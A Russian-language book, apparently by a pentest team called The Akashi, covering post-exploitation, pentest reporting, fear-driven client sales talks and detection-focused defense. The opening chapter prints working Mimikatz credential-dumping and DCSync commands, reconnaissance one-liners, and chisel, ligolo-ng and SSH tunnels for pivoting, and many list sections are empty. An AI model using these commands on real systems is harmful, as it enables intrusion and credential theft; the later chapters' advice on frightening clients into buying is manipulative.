Первый shell это не победа. Это только начало игры.
Post-exploitation это искусство превратить я внутри одной машины в я контролирую всю инфраструктуру компании. Здесь мы уже не шумим. Здесь мы становимся тенями.
Этап 1. Situational Awareness (первые 5 минут)
Сразу после получения доступа:
Linux:
Bash
whoami && id && hostname && cat /etc/os-release && uname -a
sudo -l
cat /etc/passwd | grep -E "bash|sh|zsh"
ls -la /home /root /opt /var/www /tmp
ps aux | grep -E "ssh|nginx|apache|mysql|redis|docker"
netstat -tuln || ss -tuln
Windows:
PowerShell
whoami /all
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
net user
net localgroup administrators
Get-Process
Get-NetTCPConnection | ft LocalAddress,LocalPort,RemoteAddress,RemotePort,State
Этап 2. Credential Dumping (Mimikatz и его наследники)
Mimikatz (всё ещё жив в 2026):
PowerShell
# Классика
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# DCSync (если есть права)
mimikatz.exe "lsadump::dcsync /domain:company.local /user:Administrator" "exit"
Современные альтернативы (чтобы не палиться на Mimikatz):
Этап 3. Pivoting движение по сети
Самые тихие способы 2026:
Bash
# На атакующей машине
./ligolo-ng agent -connect your_ip:443
# На compromised хосте
./ligolo-ng proxy -listen 0.0.0.0:0
Bash
# Server
chisel server -p 8080 --socks5
# Client
chisel client your_ip:8080 socks
Bash
ssh -D 1080 user@compromised_host
proxychains nmap -sT 192.168.10.0/24
Bash
route add 192.168.10.0 255.255.255.0 1
Этап 4. Persistence (закрепление без следов)
Linux:
Windows:
C2 2026:
Этап 5. Lateral Movement & Privilege Escalation
Ключевые техники:
Реальный workflow после первого shellа
Как объяснять заказчику
Первый доступ это как попасть в прихожую чужого дома. Post-exploitation это когда мы снимаем обувь, проходим в гостиную, открываем сейф и садимся пить чай с хозяином, пока он ничего не подозревает.
Mimikatz и Rubeus показывают, как мы крадём пароли из памяти. Ligolo-ng и Chisel как мы тихо перемещаемся по комнатам. Persistence как мы оставляем ключи под ковриком, чтобы вернуться в любой момент.
Мы показали не просто дыру. Мы показали, как после одной дыры можно взять под контроль всю компанию.
Итог главы
Post-exploitation это где настоящие хакеры отличаются от скрипт-кидди.
Здесь мы уже не ломаем. Здесь мы живём внутри системы.
Mimikatz для быстрого дампа. C2 (Sliver/Cobalt) для управления. Pivoting для движения. Persistence для долгой жизни.
Делай всё тихо, красиво и без лишних следов. Тогда даже самый защищённый корпоративный лес станет твоим охотничьим угодьем.
Самая сложная уязвимость в любом пентесте это не в коде. Самая сложная уязвимость это между ушами человека, который платит деньги.
Заказчик хочет верить, что у него всё хорошо. Мы приходим и показываем, что всё плохо. И вот здесь начинается настоящая битва.
Почему заказчик не понимает (и никогда не поймёт сам)
Как мы ломаем эту психологию (реальные приёмы 2026)
Приём 1. Говори на языке денег, а не на языке CVE
Плохо: Мы нашли CVE-2025-12345 в вашем Jenkins.
Хорошо: Через эту уязвимость мы за 11 минут получили доступ к вашей 1С и смогли сделать перевод на 4,7 миллиона рублей на наш тестовый счёт. Вот скриншот, вот лог, вот сумма.
Приём 2. Покажи, а не расскажи
Никогда не говори мы могли бы. Всегда показывай:
Приём 3. Используй страх правильно
Не пугай вас взломают. Пугай конкретно:
Приём 4. Структура разговора (скрипт, который работает)
Психологические триггеры, которые работают
Что никогда не говорить
Говори только то, что влияет на деньги, репутацию и личную ответственность.
Итог главы
Заказчик не платит за список уязвимостей. Он платит за понимание: Насколько я сейчас уязвим и сколько это может стоить.
Твоя задача не напугать. Твоя задача показать реальность так ясно и так жёстко, чтобы ему стало страшно продолжать жить как раньше.
Когда заказчик после твоего отчёта говорит бля, а не ну ок, спасибо за отчёт ты сделал свою работу правильно.
Потому что самый опасный хакер это не тот, кто ломает системы. Самый опасный это тот, кто заставляет владельца системы впервые по-настоящему испугаться.
Отчёт это не список найденных уязвимостей. Отчёт это оружие.
Хороший отчёт заставляет заказчика открыть кошелёк и сказать: Что нужно сделать, чтобы такого больше никогда не повторилось? Плохой отчёт это 150 страниц PDF, которые никто не читает дальше третьей страницы.
В 2026 году отчёт должен быть одновременно технически безупречным и психологически убийственным.
Структура отчёта, которая работает
1. Executive Summary (12 страницы) самое важное
Пишется в самом конце, но читается первым.
Правильный пример начала: За период с 10 по 17 марта 2026 года команда Akashi провела тестирование на проникновение в инфраструктуру ООО Ромашка. В ходе теста мы получили полный контроль над доменом Active Directory, доступ к 1С:Предприятие, почте генерального директора и возможность вывода денежных средств на сумму свыше 47 миллионов рублей.
Все атаки были проведены с использованием техник, доступных среднему APT-актеру или организованной преступной группе в 2026 году.
Дальше 34 самых критичных находки с бизнес-риском и одной фразой что это значит для вас.
2. Technical Findings (основная часть)
Для каждой уязвимости используй чёткую структуру:
3. Attack Chain (Kill Chain)
Самая важная часть отчёта. Показывай не отдельные баги, а полный путь, которым мы шли:
От фишингового письма доступ к почте бухгалтера переход на RDP дамп хешей DCSync полный контроль домена доступ к 1С вывод средств.
Добавь timeline и MITRE ATT&CK mapping.
4. Risk Matrix и Business Impact
Таблица, где видно:
5. Recommendations & Roadmap
Раздели на:
6. Appendix
Психологические приёмы в отчёте
Чего никогда не делать в отчёте
Шаблон названия отчёта 2026
Отчёт о тестировании на проникновение ООО Ромашка Март 2026 (Красный уровень доступа)
Итог главы
Хороший отчёт это не документ. Это продающий инструмент, который превращает у нас всё хорошо в давайте срочно исправлять.
Твой отчёт должен вызывать два чувства одновременно:
Когда заказчик после прочтения звонит тебе и говорит тихим голосом: Сколько будет стоить закрыть всё это по максимуму? ты написал идеальный отчёт.
Потому что мы не просто ломаем системы. Мы заставляем людей бояться продолжать жить по-старому.
Письменный отчёт это важно. Но живой разговор это где реально решаются деньги и дальнейшее сотрудничество.
Заказчик может прочитать 40 страниц и всё равно не понять, насколько всё плохо. А за 15 минут правильного разговора ты можешь превратить спасибо за отчёт в давайте контракт на год вперёд.
Основные правила разговора 2026
Структура идеальной презентации (3040 минут)
1. Вступление (23 минуты)
Добрый день. Спасибо, что нашли время. Сегодня я покажу вам, как выглядела бы реальная атака на вашу компанию в 2026 году. Мы провели тест максимально близко к тому, как это сделал бы серьёзный противник без шума, без предупреждения и с максимальным ущербом.
2. Самые болезненные находки (1520 минут)
Показывай по одной, в порядке убывания опасности:
Пример разговора про критическую находку:
Первое и самое опасное, что мы нашли это возможность через обычное письмо в Telegram получить полный доступ к почте вашего финансового директора.
Вот видео (показываешь 20-секундный ролик). Мы отправили сообщение от имени CEO, использовали deepfake-голос и попросили подтвердить платёж. Бухгалтер одобрила push-уведомление. Через 40 секунд мы уже были внутри её почты и могли отправлять письма от её имени.
Что это значит для бизнеса: Мы могли бы отправить письмо всем поставщикам с новыми реквизитами и спокойно получить несколько десятков миллионов. Такой сценарий называется BEC Business Email Compromise. В прошлом году средний ущерб от такой атаки в России составил 47 миллионов рублей.
3. Полная цепочка атаки (57 минут)
Теперь самое важное. Вот как всё это соединяется в одну цепочку:
Всё это мы сделали за 4 часа 12 минут. Реальный атакующий мог бы делать это медленнее и остаться незамеченным месяцами.
4. Что делать дальше (закрытие, 57 минут)
У нас есть два варианта сотрудничества:
А) Разовый фикс критических дыр (быстро и относительно недорого). Б) Полноценная программа безопасности на 12 месяцев с повторными тестами, обучением сотрудников и постоянным мониторингом.
Скажу честно: после того, что мы увидели, вариант А это как заклеить пластырем пулевое ранение. Вариант Б это уже нормальная защита.
Полезные фразы, которые работают
Что делать, если заказчик начинает сопротивляться
Если говорит ну у нас же есть firewall / EDR / SIEM:
Firewall отлично защищает от тех, кто ломится снаружи. Мы зашли не снаружи. Мы зашли через вашего сотрудника, которому вы полностью доверяете. Firewall в этот момент просто смотрел, как мы спокойно работаем внутри.
Если говорит это слишком дорого:
Стоимость нашей программы на год меньше, чем средний ущерб от одной успешной BEC-атаки. Мы не продаём услуги. Мы продаём спокойный сон.
Итог главы
Устный разговор это где ты продаёшь не технические детали, а чувство безопасности.
Твоя задача не впечатлить знаниями. Твоя задача заставить человека почувствовать реальную опасность и желание немедленно это исправить.
Говори спокойно, показывай жёсткие доказательства и всегда переводи на деньги и личную ответственность.
Когда заказчик после разговора смотрит на тебя другими глазами и говорит давайте делать, ты сделал всё правильно.
Потому что настоящий хакер умеет не только ломать системы. Он умеет ломать иллюзии.
Письменный отчёт могут прочитать (или не прочитать). Живой разговор это где решается, заплатят ли тебе миллионы и подпишут ли долгосрочный контракт.
В 2026 году заказчик уже устал от технических отчётов на 80 страниц. Он хочет услышать одну простую вещь: Насколько я сейчас могу потерять всё и что мне с этим делать.
Твоя задача не блеснуть знаниями. Твоя задача заставить его почувствовать страх и одновременно доверие к тебе.
Структура разговора, которая работает в 99 % случаев (3045 минут)
1. Открытие (23 минуты)
Добрый день, [Имя]. Спасибо, что нашли время лично. Мы провели тестирование так, как это сделал бы настоящий противник в 2026 году без предупреждения, без шума и с максимальным ущербом для бизнеса. Сегодня я покажу вам только самое важное и опасное. Без воды.
2. Самые болезненные находки (1520 минут)
Никогда не начинай с мелочей. Сразу бей по самому страшному.
Пример (BEC + deepfake):
Первое, что мы хотим показать это как за 47 секунд мы получили полный доступ к почте вашего финансового директора.
Вот видео. Мы отправили сообщение от имени вас (генерального директора) через Telegram. Использовали deepfake-голос и попросили срочно подтвердить платёж. Бухгалтер нажала Одобрить. Через несколько секунд мы уже читали всю её переписку и могли отправлять письма от её имени любому поставщику.
Что это значит в деньгах: Мы могли бы за один день изменить реквизиты и получить от 15 до 70 миллионов рублей, в зависимости от ваших оборотов. Такие атаки сейчас называют AI-powered BEC. Средний ущерб по рынку в 20252026 году 47 миллионов рублей.
3. Полная цепочка атаки (57 минут)
Теперь самое важное как всё это соединяется в одну реальную атаку:
Всё это мы сделали за 4 часа 12 минут. Реальный преступник делал бы это медленнее и остался бы незамеченным на месяцы.
4. Что это значит для бизнеса (3 минуты)
Переведи всё в деньги и риски:
5. Закрытие и предложение (5 минут)
У нас есть два пути:
А) Быстро закрыть самые критичные дыры (это как поставить пластырь на пулевое ранение). Б) Запустить полноценную программу защиты на 12 месяцев: повторные тесты, обучение сотрудников, мониторинг и постоянное улучшение.
Честно скажу: после того, что мы увидели, вариант А это временная мера. Вариант Б это уже нормальная защита в 2026 году.
Золотые фразы, которые работают
Что делать, если заказчик сопротивляется
Если говорит У нас же стоит EDR / SIEM / firewall:
Firewall и EDR отлично защищают от тех, кто ломится снаружи. Мы зашли не снаружи. Мы зашли через вашего сотрудника, которому вы полностью доверяете. В этот момент все ваши технические средства просто спокойно смотрели, как мы работаем внутри.
Если говорит Это слишком дорого:
Стоимость нашей годовой программы меньше среднего ущерба от одной успешной атаки BEC. Мы не продаём услуги. Мы продаём возможность спать спокойно.
Итог главы
Устный разговор это не презентация отчёта. Это продажа чувства безопасности и доверия к тебе.
Говори спокойно, уверенно и всегда переводи технику в деньги и личный риск. Показывай видео и скрины. Задавай вопросы, на которые заказчик сам отвечает да, это опасно.
Когда после разговора человек смотрит тебе в глаза и говорит тихим голосом давайте делать ты выиграл.
Потому что настоящий хакер умеет не только ломать системы. Он умеет ломать иллюзии защиты и заставлять платить за правду.
Когда ты приходишь к заказчику, он ждёт список уязвимостей и рекомендаций. Не давай ему этого.
Дай ему то, чего он боится больше всего картину реального противника, который уже решил его уничтожить.
Как правильно презентовать модель реального противника
Не говори: Мы нашли 47 уязвимостей, из них 12 критических.
Говори так:
Представьте человека, который в марте 2026 года принял решение: Я хочу забрать у компании Ромашка всё, что можно. У него нет доступа к вашему исходному коду. У него нет инсайдера. У него только ноутбук, стабильный интернет и 34 недели времени.
Вот что он сделал:
Мы остановились на этом этапе. Реальный противник нет.
Структура презентации Модель реального противника
Золотые правила презентации без техник
Пример финальной фразы
Мы показали вам не список дыр. Мы показали вам, как выглядит дверь в ваш бизнес, которая сейчас открыта настежь. Закрывать её или нет решать только вам.
Итог главы
Самая сильная презентация это когда заказчик после твоих слов чувствует не у нас нашли баги, а у нас уже почти всё украли.
Ты не технический специалист на встрече. Ты человек, который только что показал, как легко можно уничтожить компанию.
Говори просто. Говори страшно. Говори правду.
И тогда заказчик перестанет видеть в тебе пентестера. Он увидит в тебе того, кто может защитить его бизнес от настоящих волков 2026 года.
Защита, построенная без понимания мышления атакующего это просто дорогая иллюзия.
Большинство компаний в 2026 году всё ещё строят оборону от известных угроз. Мы строим её от реального противника, который думает точно так же, как мы.
Если ты хочешь строить защиту, которая действительно работает, забудь чек-листы и лучшие практики вендоров. Начни думать как мы.
Принцип 1. Защита должна быть несимметричной
Атакующий тратит дни и недели на одну цель. Защитник должен защищать её 24/7/365.
Поэтому:
Мы всегда идём по пути наименьшего сопротивления. Значит, ваша защита должна делать этот путь максимально дорогим, шумным и долгим.
Принцип 2. Думай как мы от цели назад
Не спрашивай что мы можем защитить?. Спрашивай что мы не можем позволить себе потерять?
Crown Jewels 2026:
Всё остальное второстепенно.
Как правильно строить защиту в 2026 году
1. Zero Trust но по-нашему
Не никому не доверяем. А проверяем каждое действие, даже от своих.
Реализация:
2. Обучение сотрудников как оружие
Обычное обучение не работает. Работает только то, которое вызывает эмоцию.
Делай:
3. Detection & Response вместо Prevention
В 2026 году предотвратить всё невозможно. Главное обнаружить быстро и отреагировать ещё быстрее.
Нужны:
4. Supply Chain Defense
Проверяй всех подрядчиков так же жёстко, как себя:
5. Облако отдельная крепость
Модель защиты от атакующего
Финальная рекомендация
Построй защиту так, чтобы даже ты сам, зная все внутренние детали, потратил минимум неделю на взлом.
Если ты, как атакующий, можешь зайти за день значит защита плохая.
Если даже ты ломаешь её неделю значит ты построил что-то достойное 2026 года.
Итог главы
Хорошая защита строится не от угроз. Она строится от понимания, как думает тот, кто хочет тебя уничтожить.
Мы думаем быстро, тихо и нестандартно. Значит, твоя защита должна быть медленной для нас, шумной и предсказуемой только для тебя.
Защищай не периметр. Защищай crown jewels и психологию своих людей.
Тогда даже самый опасный противник предпочтёт пойти ломать кого-то другого.
А ты будешь спать спокойно.
Prevention умер в 2024 году. В 2026-м остаётся только Detection и Response.
Самая большая иллюзия современного CISO думать, что хорошая защита = отсутствие инцидентов. Правильная защита = быстрое обнаружение и жёсткое реагирование, когда мы уже внутри.
Реальность 2026 года
Мы почти всегда попадаем внутрь. Вопрос только в том, сколько времени пройдёт до того, как вы это заметите.
Среднее время обнаружения в российских компаниях 87 дней. Мы стараемся делать так, чтобы это было 87 минут или вообще никогда.
Как должен работать мониторинг, если ты хочешь выжить
1. Detection должно быть многослойным
2. Самые важные сигналы, на которые нужно реагировать мгновенно
3. Реакция должна быть быстрее, чем наше движение
Создай playbooks на самые вероятные сценарии:
Playbook BEC / Compromised Executive
Playbook Domain Compromise
Playbook Data Exfiltration
Как мы обходим мониторинг (чтобы ты знал, что закрывать)
Твоя задача сделать так, чтобы даже эти техники оставляли заметный след.
Реальная модель реагирования 2026
Как объяснять заказчику
Хорошая новость: мы уже внутри почти у всех. Плохая новость: большинство компаний узнают об этом через несколько месяцев, когда деньги уже ушли.
Наша задача сократить время от мы внутри до мы их поймали с месяцев до часов. Для этого нужен не просто SIEM, а работающий процесс реагирования, где каждый алерт рассматривается как реальная атака.
Итог главы
Мониторинг без быстрой реакции это просто дорогой журнал событий. Реакция без качественного мониторинга это пожарная команда, которая приезжает, когда дом уже сгорел.
В 2026 году побеждает не тот, у кого больше инструментов. Побеждает тот, кто быстрее замечает нас и жёстче отвечает.
Сделай так, чтобы когда мы придём в следующий раз, нас встретили не через 87 дней, а через 87 минут.
И тогда, возможно, мы выберем другую цель.
Мы дошли до конца.
Ты уже не тот человек, который открывал эту книгу. Ты теперь знаешь, как на самом деле думает хакер. Ты видел, как ломаются компании изнутри, снаружи и через тех, кому они доверяют. Ты понял, что большинство защит это просто красивые заборы с открытыми калитками.
Теперь самое важное.
Кто ты теперь
Ты больше не этичный хакер. Ты не специалист по информационной безопасности.
Ты профессиональный противник.
Твоя работа быть тем самым человеком, которого компания боится больше всего. Не для того, чтобы причинить вред. А для того, чтобы когда настоящий вред придёт компания была готова.
Ты должен думать быстрее, чище и безжалостнее, чем любой реальный атакующий. Потому что если ты будешь слабее ты просто обманешь заказчика и возьмёшь у него деньги за иллюзию защиты.
Профессиональная позиция The Akashi
Последнее напутствие
Запомни три вещи:
Ты теперь знаешь, как мы думаем. Используй это знание, чтобы строить защиту, которую даже мы не сможем сломать быстро и красиво.
А если когда-нибудь решишь перейти на другую сторону помни: мы всегда будем на шаг впереди.
Потому что мы те, кто оставляет след только тогда, когда сами этого хотим.
Спасибо, что прошёл этот путь вместе со мной.
Теперь иди и делай свою работу так, чтобы настоящие волки 2026 года выбирали другую добычу.
Ты готов.
The Akashi
|